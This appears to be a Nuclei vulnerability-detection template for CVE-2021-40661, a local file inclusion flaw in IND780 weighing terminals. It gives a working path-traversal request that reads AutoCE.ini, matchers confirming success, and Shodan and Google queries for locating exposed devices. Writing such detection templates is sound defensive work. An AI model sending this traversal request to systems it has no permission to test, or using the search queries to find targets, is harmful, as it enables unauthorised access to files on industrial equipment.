id: CVE-2021-40661 info: name: IND780 - Local File Inclusion author: For3stCo1d severity: high description: | IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. impact: | An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system. remediation: | Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks. reference: - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661 - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm - https://nvd.nist.gov/vuln/detail/CVE-2021-40661 - https://github.com/Live-Hack-CVE/CVE-2021-40661 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40661 cwe-id: CWE-22 epss-score: 0.01137 epss-percentile: 0.84411 cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: mt product: ind780_firmware shodan-query: IND780 google-query: inurl:excalweb.dll tags: cve2021,cve,ind780,lfi,mt http: - method: GET path: - "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini" matchers-condition: and matchers: - type: word part: body words: - 'ExePath=\Windows' - 'WorkDir=\Windows' condition: and - type: status status: - 200 # digest: 4b0a00483046022100b7e2b1761ea31f96096ee954d371b91df663bcfa45c8f773a58b8f5f509c9e11022100a7cd7929229cc6298d1bd75e2f8a31d62e513dfae2e7c5fc750a14a9a971e44c:922c64590222798bb761d5b6d8e72950